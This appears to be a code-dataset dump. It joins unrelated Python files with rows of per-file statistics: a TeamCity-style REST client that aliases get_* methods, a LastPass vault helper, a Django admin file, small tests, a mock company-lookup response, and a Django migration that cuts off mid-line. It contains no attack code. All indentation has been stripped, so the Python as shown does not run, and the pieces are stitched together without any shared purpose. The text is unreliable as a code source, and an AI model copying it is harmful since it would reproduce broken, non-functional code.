:param async_req: bool
:param str build_locator: (required)
:param str name: (required)
:return: str
"""
return self.serve_build_statistic_value(build_locator, name, **kwargs)
def get_build_statistic_values(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_build_statistic_values(build_locator, **kwargs)
def get_build_status_icon(self, build_locator, suffix, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str suffix: (required)
:return: None
"""
return self.serve_build_status_icon(build_locator, suffix, **kwargs)
def get_source_file(self, build_locator, file_name, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str file_name: (required)
:return: None
"""
return self.serve_source_file(build_locator, file_name, **kwargs)
def get_tags(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str locator:
:param str fields:
:return: Tags
"""
return self.serve_tags(build_locator, **kwargs)
class BuildQueueApi(BuildQueueApi):
def get_build_field_by_build_only(self, build_locator, field, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field_by_build_only(
build_locator, field, **kwargs)
def get_compatible_agents(self, queued_build_locator, **kwargs):
"""
:param async_req: bool
:param str queued_build_locator: (required)
:param str fields:
:return: Agents
"""
return self.serve_compatible_agents(queued_build_locator, **kwargs)
def get_tags(self, build_locator, **kwargs):
"""
:param async_req: bool
:param str build_locator: (required)
:param str locator:
:param str fields:
:return: Tags
"""
return self.serve_tags(build_locator, **kwargs)
class BuildTypeApi(BuildTypeApi):
def get(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type_xml(bt_locator, **kwargs)
def get_branches(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str locator:
:param str fields:
:return: Branches
"""
return self.serve_branches(bt_locator, **kwargs)
def get_build_field(self, bt_locator, build_locator, field, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field(
bt_locator, build_locator, field, **kwargs)
def get_build_type_builds_tags(self, bt_locator, field, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str field: (required)
:return: Tags
"""
return self.serve_build_type_builds_tags(bt_locator, field, **kwargs)
def get_build_type_field(self, bt_locator, field, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_type_field(bt_locator, field, **kwargs)
def get_build_type_template(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type_template(bt_locator, **kwargs)
def get_build_type_xml(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type_xml(bt_locator, **kwargs)
def get_build_with_project(self, bt_locator, build_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str build_locator: (required)
:param str fields:
:return: Build
"""
return self.serve_build_with_project(
bt_locator, build_locator, **kwargs)
def get_builds(self, bt_locator, **kwargs):
"""
:param async_req: bool
:param str bt_locator: (required)
:param str status:
:param str triggered_by_user:
:param bool include_personal:
:param bool include_canceled:
:param bool only_pinned:
:param list[str] tag:
:param str agent_name:
:param str since_build:
:param str since_date:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Builds
"""
return self.serve_builds(bt_locator, **kwargs)
class ChangeApi(ChangeApi):
def get(self, change_locator, **kwargs):
"""
:param async_req: bool
:param str change_locator: (required)
:param str fields:
:return: Change
"""
return self.serve_change(change_locator, **kwargs)
def get_change(self, change_locator, **kwargs):
"""
:param async_req: bool
:param str change_locator: (required)
:param str fields:
:return: Change
"""
return self.serve_change(change_locator, **kwargs)
def get_changes(self, **kwargs):
"""
:param async_req: bool
:param str project:
:param str build_type:
:param str build:
:param str vcs_root:
:param str since_change:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Changes
"""
return self.serve_changes(**kwargs)
class DefaultApi(DefaultApi):
def get_api_version(self, **kwargs):
"""
:param async_req: bool
:return: str
"""
return self.serve_api_version(**kwargs)
def get_build_field_short(
self,
project_locator,
bt_locator,
build_locator,
field,
**kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field_short(
project_locator, bt_locator, build_locator, field, **kwargs)
def get_plugin_info(self, **kwargs):
"""
:param async_req: bool
:param str fields:
:return: Plugin
"""
return self.serve_plugin_info(**kwargs)
def get_root(self, **kwargs):
"""
:param async_req: bool
:return: str
"""
return self.serve_root(**kwargs)
def get_version(self, **kwargs):
"""
:param async_req: bool
:return: str
"""
return self.serve_version(**kwargs)
class GroupApi(GroupApi):
def get(self, group_locator, **kwargs):
"""
:param async_req: bool
:param str group_locator: (required)
:param str fields:
:return: Group
"""
return self.serve_group(group_locator, **kwargs)
def get_group(self, group_locator, **kwargs):
"""
:param async_req: bool
:param str group_locator: (required)
:param str fields:
:return: Group
"""
return self.serve_group(group_locator, **kwargs)
def get_groups(self, **kwargs):
"""
:param async_req: bool
:param str fields:
:return: Groups
"""
return self.serve_groups(**kwargs)
def get_user_properties(self, group_locator, name, **kwargs):
"""
:param async_req: bool
:param str group_locator: (required)
:param str name: (required)
:return: str
"""
return self.serve_user_properties(group_locator, name, **kwargs)
class InvestigationApi(InvestigationApi):
def get(self, investigation_locator, **kwargs):
"""
:param async_req: bool
:param str investigation_locator: (required)
:param str fields:
:return: Investigation
"""
return self.serve_instance(investigation_locator, **kwargs)
def get_instance(self, investigation_locator, **kwargs):
"""
:param async_req: bool
:param str investigation_locator: (required)
:param str fields:
:return: Investigation
"""
return self.serve_instance(investigation_locator, **kwargs)
class ProblemApi(ProblemApi):
def get(self, problem_locator, **kwargs):
"""
:param async_req: bool
:param str problem_locator: (required)
:param str fields:
:return: Problem
"""
return self.serve_instance(problem_locator, **kwargs)
def get_instance(self, problem_locator, **kwargs):
"""
:param async_req: bool
:param str problem_locator: (required)
:param str fields:
:return: Problem
"""
return self.serve_instance(problem_locator, **kwargs)
class ProblemOccurrenceApi(ProblemOccurrenceApi):
def get(self, problem_locator, **kwargs):
"""
:param async_req: bool
:param str problem_locator: (required)
:param str fields:
:return: ProblemOccurrence
"""
return self.serve_instance(problem_locator, **kwargs)
def get_instance(self, problem_locator, **kwargs):
"""
:param async_req: bool
:param str problem_locator: (required)
:param str fields:
:return: ProblemOccurrence
"""
return self.serve_instance(problem_locator, **kwargs)
class ProjectApi(ProjectApi):
def get(self, project_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str fields:
:return: Project
"""
return self.serve_project(project_locator, **kwargs)
def get_build_field_with_project(
self,
project_locator,
bt_locator,
build_locator,
field,
**kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str build_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_field_with_project(
project_locator, bt_locator, build_locator, field, **kwargs)
def get_build_type(self, project_locator, bt_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type(project_locator, bt_locator, **kwargs)
def get_build_type_field_with_project(
self, project_locator, bt_locator, field, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_build_type_field_with_project(
project_locator, bt_locator, field, **kwargs)
def get_build_type_templates(self, project_locator, bt_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str fields:
:return: BuildType
"""
return self.serve_build_type_templates(
project_locator, bt_locator, **kwargs)
def get_build_types_in_project(self, project_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str fields:
:return: BuildTypes
"""
return self.serve_build_types_in_project(project_locator, **kwargs)
def get_build_with_project(
self,
project_locator,
bt_locator,
build_locator,
**kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str build_locator: (required)
:param str fields:
:return: Build
"""
return self.serve_build_with_project(
project_locator, bt_locator, build_locator, **kwargs)
def get_builds(self, project_locator, bt_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str bt_locator: (required)
:param str status:
:param str triggered_by_user:
:param bool include_personal:
:param bool include_canceled:
:param bool only_pinned:
:param list[str] tag:
:param str agent_name:
:param str since_build:
:param str since_date:
:param int start:
:param int count:
:param str locator:
:param str fields:
:return: Builds
"""
return self.serve_builds(project_locator, bt_locator, **kwargs)
def get_project(self, project_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str fields:
:return: Project
"""
return self.serve_project(project_locator, **kwargs)
def get_project_field(self, project_locator, field, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_project_field(project_locator, field, **kwargs)
def get_projects(self, **kwargs):
"""
:param async_req: bool
:param str locator:
:param str fields:
:return: Projects
"""
return self.serve_projects(**kwargs)
def get_templates_in_project(self, project_locator, **kwargs):
"""
:param async_req: bool
:param str project_locator: (required)
:param str fields:
:return: BuildTypes
"""
return self.serve_templates_in_project(project_locator, **kwargs)
class ServerApi(ServerApi):
def get_plugins(self, **kwargs):
"""
:param async_req: bool
:param str fields:
:return: Plugins
"""
return self.serve_plugins(**kwargs)
def get_server_info(self, **kwargs):
"""
:param async_req: bool
:param str fields:
:return: Server
"""
return self.serve_server_info(**kwargs)
def get_server_version(self, field, **kwargs):
"""
:param async_req: bool
:param str field: (required)
:return: str
"""
return self.serve_server_version(field, **kwargs)
class TestApi(TestApi):
def get(self, test_locator, **kwargs):
"""
:param async_req: bool
:param str test_locator: (required)
:param str fields:
:return: Test
"""
return self.serve_instance(test_locator, **kwargs)
def get_instance(self, test_locator, **kwargs):
"""
:param async_req: bool
:param str test_locator: (required)
:param str fields:
:return: Test
"""
return self.serve_instance(test_locator, **kwargs)
class TestOccurrenceApi(TestOccurrenceApi):
def get(self, test_locator, **kwargs):
"""
:param async_req: bool
:param str test_locator: (required)
:param str fields:
:return: TestOccurrence
"""
return self.serve_instance(test_locator, **kwargs)
def get_instance(self, test_locator, **kwargs):
"""
:param async_req: bool
:param str test_locator: (required)
:param str fields:
:return: TestOccurrence
"""
return self.serve_instance(test_locator, **kwargs)
class UserApi(UserApi):
def get(self, user_locator, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str fields:
:return: User
"""
return self.serve_user(user_locator, **kwargs)
def get_user(self, user_locator, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str fields:
:return: User
"""
return self.serve_user(user_locator, **kwargs)
def get_user_field(self, user_locator, field, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_user_field(user_locator, field, **kwargs)
def get_user_properties(self, user_locator, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_user_properties(user_locator, **kwargs)
def get_user_property(self, user_locator, name, **kwargs):
"""
:param async_req: bool
:param str user_locator: (required)
:param str name: (required)
:return: str
"""
return self.serve_user_property(user_locator, name, **kwargs)
def get_users(self, **kwargs):
"""
:param async_req: bool
:param str locator:
:param str fields:
:return: Users
"""
return self.serve_users(**kwargs)
class VcsRootApi(VcsRootApi):
def get(self, vcs_root_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str fields:
:return: VcsRoot
"""
return self.serve_root(vcs_root_locator, **kwargs)
def get_field(self, vcs_root_locator, field, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_field(vcs_root_locator, field, **kwargs)
def get_instance_field(
self,
vcs_root_locator,
vcs_root_instance_locator,
field,
**kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str vcs_root_instance_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_instance_field(
vcs_root_locator, vcs_root_instance_locator, field, **kwargs)
def get_properties(self, vcs_root_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_properties(vcs_root_locator, **kwargs)
def get_property(self, vcs_root_locator, name, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str name: (required)
:return: str
"""
return self.serve_property(vcs_root_locator, name, **kwargs)
def get_root(self, vcs_root_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str fields:
:return: VcsRoot
"""
return self.serve_root(vcs_root_locator, **kwargs)
def get_root_instance(
self,
vcs_root_locator,
vcs_root_instance_locator,
**kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str vcs_root_instance_locator: (required)
:param str fields:
:return: VcsRootInstance
"""
return self.serve_root_instance(
vcs_root_locator, vcs_root_instance_locator, **kwargs)
def get_root_instance_properties(
self,
vcs_root_locator,
vcs_root_instance_locator,
**kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str vcs_root_instance_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_root_instance_properties(
vcs_root_locator, vcs_root_instance_locator, **kwargs)
def get_root_instances(self, vcs_root_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_locator: (required)
:param str fields:
:return: VcsRootInstances
"""
return self.serve_root_instances(vcs_root_locator, **kwargs)
def get_roots(self, **kwargs):
"""
:param async_req: bool
:param str locator:
:param str fields:
:return: VcsRoots
"""
return self.serve_roots(**kwargs)
class VcsRootInstanceApi(VcsRootInstanceApi):
def get(self, vcs_root_instance_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_instance_locator: (required)
:param str fields:
:return: VcsRootInstance
"""
return self.serve_instance(vcs_root_instance_locator, **kwargs)
def get_instance(self, vcs_root_instance_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_instance_locator: (required)
:param str fields:
:return: VcsRootInstance
"""
return self.serve_instance(vcs_root_instance_locator, **kwargs)
def get_instance_field(self, vcs_root_instance_locator, field, **kwargs):
"""
:param async_req: bool
:param str vcs_root_instance_locator: (required)
:param str field: (required)
:return: str
"""
return self.serve_instance_field(
vcs_root_instance_locator, field, **kwargs)
def get_instances(self, **kwargs):
"""
:param async_req: bool
:param str locator:
:param str fields:
:return: VcsRootInstances
"""
return self.serve_instances(**kwargs)
def get_root_instance_properties(self, vcs_root_instance_locator, **kwargs):
"""
:param async_req: bool
:param str vcs_root_instance_locator: (required)
:param str fields:
:return: Properties
"""
return self.serve_root_instance_properties(
vcs_root_instance_locator, **kwargs)
| 29.833333
| 80
| 0.591964
| 3,025
| 27,924
| 5.204628
| 0.040992
| 0.105183
| 0.090447
| 0.107406
| 0.890117
| 0.861026
| 0.830539
| 0.818216
| 0.773882
| 0.739837
| 0
| 0
| 0.306546
| 27,924
| 935
| 81
| 29.865241
| 0.813055
| 0.360335
| 0
| 0.353909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.366255
| false
| 0
| 0.004115
| 0
| 0.8107
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
b28e22454e7cef862fa5b1360058feef496f9769
| 242
|
py
|
Python
|
utils.py
|
dionysio/haveibeenpwned_lastpass
|
efd8f1c785317fd5d948ee91125952219f27e5b2
|
[
"MIT"
] | 101
|
2018-03-05T10:55:40.000Z
|
2021-12-06T22:59:01.000Z
|
utils.py
|
dionysio/haveibeenpwned_lastpass
|
efd8f1c785317fd5d948ee91125952219f27e5b2
|
[
"MIT"
] | 3
|
2018-03-19T22:03:12.000Z
|
2018-03-31T09:24:30.000Z
|
utils.py
|
dionysio/haveibeenpwned_lastpass
|
efd8f1c785317fd5d948ee91125952219f27e5b2
|
[
"MIT"
] | 13
|
2018-03-05T23:06:12.000Z
|
2021-04-21T15:23:22.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import monkeypatch_lastpass
import lastpass
def get_lastpass_vault(username, password, multifactor_password=None):
return lastpass.Vault.open_remote(username, password, multifactor_password)
| 30.25
| 79
| 0.793388
| 30
| 242
| 6.2
| 0.666667
| 0.139785
| 0.290323
| 0.376344
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004587
| 0.099174
| 242
| 8
| 79
| 30.25
| 0.848624
| 0.173554
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 1
| 0.5
| 0.25
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
|
0
| 7
|
b2a3e9ad20bc261a0edc524a6069c1c1f3dd00cf
| 175
|
py
|
Python
|
shoppinglist/admin.py
|
ingridguo/django_apps_collection
|
bdc2050c6085937a34229d1b21bd1a304c44f0df
|
[
"MIT"
] | null | null | null |
shoppinglist/admin.py
|
ingridguo/django_apps_collection
|
bdc2050c6085937a34229d1b21bd1a304c44f0df
|
[
"MIT"
] | 1
|
2018-07-08T14:51:52.000Z
|
2018-07-08T14:55:00.000Z
|
shoppinglist/admin.py
|
ingridguo/django_apps_collection
|
bdc2050c6085937a34229d1b21bd1a304c44f0df
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
# Register your models here.
from .models import Item
from .models import ItemsList
admin.site.register(ItemsList)
admin.site.register(Item)
| 21.875
| 32
| 0.811429
| 25
| 175
| 5.68
| 0.48
| 0.140845
| 0.225352
| 0.366197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 175
| 8
| 33
| 21.875
| 0.916129
| 0.148571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0c01cddc80fa879938d5f61d3a89133c82cb8220
| 363
|
py
|
Python
|
tests/test_utils.py
|
bfmcneill/twitter_picker
|
651881a4a3750473899c1b289455000a5a137918
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
bfmcneill/twitter_picker
|
651881a4a3750473899c1b289455000a5a137918
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
bfmcneill/twitter_picker
|
651881a4a3750473899c1b289455000a5a137918
|
[
"MIT"
] | null | null | null |
import twitter_picker.utils as utils
def test_project_root_is_path_object():
import pathlib
assert isinstance(utils.get_project_root(), pathlib.Path)
def test_project_root_is_valid_path():
import pathlib
assert utils.get_project_root().exists()
def test_project_root_is_dir():
import pathlib
assert utils.get_project_root().is_dir()
| 21.352941
| 61
| 0.774105
| 53
| 363
| 4.886792
| 0.358491
| 0.254826
| 0.200772
| 0.208494
| 0.525097
| 0.293436
| 0.293436
| 0
| 0
| 0
| 0
| 0
| 0.146006
| 363
| 16
| 62
| 22.6875
| 0.835484
| 0
| 0
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.3
| 1
| 0.3
| true
| 0
| 0.4
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0c4b40e6e3bdbe8085db8f821ed3539bc5493428
| 2,483
|
py
|
Python
|
services/mock.py
|
devx3/hero-testes-tech-talk
|
604641f41c18cd9f9f2b59c8c25cf0a2fc6adfcb
|
[
"MIT"
] | null | null | null |
services/mock.py
|
devx3/hero-testes-tech-talk
|
604641f41c18cd9f9f2b59c8c25cf0a2fc6adfcb
|
[
"MIT"
] | 3
|
2021-09-24T01:23:38.000Z
|
2021-09-28T22:15:29.000Z
|
services/mock.py
|
devx3/hero-testes-tech-talk
|
604641f41c18cd9f9f2b59c8c25cf0a2fc6adfcb
|
[
"MIT"
] | 1
|
2021-09-29T13:18:39.000Z
|
2021-09-29T13:18:39.000Z
|
RESPONSE_MOCK = [
{
"request_id": "REQUEST_UUID",
"results": [
{
"company_id": "COMPANY_UUID",
"companies": [
{
"cnpj": "CNPJ DA EMPRESA",
"company_name": "Razão Social",
"trading_name": "Nome fantasia",
"email": "email@example.net",
"phone": "Telefone da empresa",
"address_street": "ENDEREÇO SEM O NUMERO",
"address_number": "NUMERO",
"address_complement": "COMPLEMENTO",
"address_district": "BAIRRO",
"address_zipcode": "CEP",
"address_region": "ESTADO",
"address_country": "PAÍS DE ORIGEM",
"qsa": [
{
"first_name": "Primeiro nome",
"last_name": "Ultimo nome",
"qual": "Função do sócio na empresa"
}
]
}
]
}
]
},
{
"request_id": "REQUEST_UUID2",
"results": [
{
"company_id": "COMPANY_UUID",
"companies": [
{
"cnpj": "CNPJ DA EMPRESA",
"company_name": "Razão Social",
"trading_name": "Nome fantasia",
"email": "email@example.net",
"phone": "Telefone da empresa",
"address_street": "ENDEREÇO SEM O NUMERO",
"address_number": "NUMERO",
"address_complement": "COMPLEMENTO",
"address_district": "BAIRRO",
"address_zipcode": "CEP",
"address_region": "ESTADO",
"address_country": "PAÍS DE ORIGEM",
"qsa": [
{
"first_name": "Primeiro nome",
"last_name": "Ultimo nome",
"qual": "Função do sócio na empresa"
}
]
}
]
}
]
},
]
| 38.2
| 68
| 0.331051
| 144
| 2,483
| 5.493056
| 0.361111
| 0.045512
| 0.040455
| 0.058154
| 0.932996
| 0.932996
| 0.932996
| 0.932996
| 0.932996
| 0.932996
| 0
| 0.000927
| 0.565445
| 2,483
| 64
| 69
| 38.796875
| 0.732159
| 0
| 0
| 0.59375
| 0
| 0
| 0.34112
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a7484596cd3f204bbc3c47fa31256eb5283cb863
| 177,504
|
py
|
Python
|
common/migrations/0001_squashed_0048_auto_20170111_1744.py
|
baylee-d/cos.io
|
3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43
|
[
"Apache-2.0"
] | null | null | null |
common/migrations/0001_squashed_0048_auto_20170111_1744.py
|
baylee-d/cos.io
|
3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43
|
[
"Apache-2.0"
] | null | null | null |
common/migrations/0001_squashed_0048_auto_20170111_1744.py
|
baylee-d/cos.io
|
3f88acb0feb7a167bf9e81c42e28f9d2d38bbd43
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2017-01-11 18:31
from __future__ import unicode_literals
import common.blocks.collapsebox
import common.blocks.columns
import common.blocks.table
import common.blocks.tabs
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
import taggit.managers
import wagtail.wagtailcore.blocks
import wagtail.wagtailcore.fields
import wagtail.wagtailembeds.blocks
import wagtail.wagtailimages.blocks
import wagtail.wagtailsearch.index
class Migration(migrations.Migration):
replaces = [('common', '0001_initial'), ('common', '0002_auto_20161010_1354'), ('common', '0003_auto_20161010_1511'), ('common', '0004_auto_20161010_1608'), ('common', '0005_auto_20161010_1645'), ('common', '0006_auto_20161010_1747'), ('common', '0007_auto_20161011_1925'), ('common', '0008_auto_20161011_1937'), ('common', '0009_auto_20161011_1948'), ('common', '0010_auto_20161011_2038'), ('common', '0011_auto_20161011_2129'), ('common', '0012_auto_20161012_1555'), ('common', '0013_auto_20161013_1520'), ('common', '0014_remove_person_title'), ('common', '0015_auto_20161013_1746'), ('common', '0016_auto_20161014_1320'), ('common', '0017_upimagepath'), ('common', '0018_auto_20161014_1805'), ('common', '0019_auto_20161017_1323'), ('common', '0019_auto_20161014_1934'), ('common', '0020_merge_20161017_1426'), ('common', '0021_formpage_action'), ('common', '0018_auto_20161017_1801'), ('common', '0022_merge_20161017_1830'), ('common', '0023_auto_20161017_1849'), ('common', '0016_auto_20161013_2111'), ('common', '0020_merge_20161017_1721'), ('common', '0021_auto_20161017_1734'), ('common', '0024_merge_20161018_2019'), ('common', '0025_auto_20161018_2101'), ('common', '0026_versionedredirect'), ('common', '0027_auto_20161025_1606'), ('common', '0028_auto_20161025_1816'), ('common', '0029_organization_logo'), ('common', '0030_auto_20161026_1433'), ('common', '0031_organization_pattern'), ('common', '0032_auto_20161027_1502'), ('common', '0033_auto_20161031_1758'), ('common', '0034_auto_20161031_2110'), ('common', '0035_auto_20161101_1423'), ('common', '0036_auto_20161101_1847'), ('common', '0037_inkinddonation'), ('common', '0038_organization_url'), ('common', '0039_auto_20161102_1850'), ('common', '0040_auto_20161102_1900'), ('common', '0041_auto_20161109_1602'), ('common', '0042_auto_20161111_1901'), ('common', '0043_auto_20161111_1924'), ('common', '0044_auto_20161114_1553'), ('common', '0045_auto_20161115_1644'), ('common', '0046_auto_20161115_1703'), ('common', '0047_auto_20161115_1743'), ('common', '0048_auto_20170111_1744')]
initial = True
dependencies = [
('wagtailimages', '0013_make_rendition_upload_callable'),
('wagtailforms', '0003_capitalizeverbose'),
('taggit', '0002_auto_20150616_2121'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('wagtailcore', '0029_unicode_slugfield_dj19'),
('wagtailimages', '0015_fill_filter_spec_field'),
('wagtailredirects', '0005_capitalizeverbose'),
]
operations = [
migrations.CreateModel(
name='CustomPage',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('content', wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('twocolumn', wagtail.wagtailcore.blocks.StructBlock((('left_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('right_column_size', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('12', 'Full Width'), ('11', '11/12'), ('10', '5/6'), ('9', 'Three Quarters'), ('8', 'Two Thirds'), ('7', '7/12'), ('6', 'Half Width'), ('5', '5/12'), ('4', 'One Third'), ('3', 'One Quarter'), ('2', '1/6'), ('1', '1/12')], default='6')), ('left_column', wagtail.wagtailcore.blocks.StreamBlock((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('customized_image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!'))), classname='col4', icon='arrow-left', label='Left column content')), ('right_column', 